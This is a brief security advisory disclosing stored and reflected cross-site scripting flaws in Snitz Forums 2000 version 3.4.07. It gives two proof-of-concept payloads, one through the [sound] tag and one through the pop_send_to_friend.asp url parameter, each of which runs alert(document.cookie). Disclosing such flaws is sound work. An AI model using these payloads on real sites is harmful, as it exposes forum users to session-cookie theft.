************************************************************** Application: Snitz Forums 2000 Version affected: 3.4.07 Website: http://forum.snitz.com/ Discovered By: Andrea Fabrizi Email: andrea.fabrizi@xxxxxxxxx Web: http://www.andreafabrizi.it Vuln: Multiple Cross-Site Scripting ************************************************************** ###### PERMANENT XSS If [sound] tag is allowed: [sound]http://url_to_valid_mp3_or_m3u_file.m3u"; onLoad="alert(document.cookie)[/sound] ###### ###### LINK XSS http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad ="alert(document.cookie)"> Note the space: onLoad<space>="alert(document.cookie)" ###### -- Andrea Fabrizi http://www.andreafabrizi.it
![http://www.google.it/intl/it_it/images/logo.gif"](http://www.google.it/intl/it_it/images/logo.gif"){kind=link}
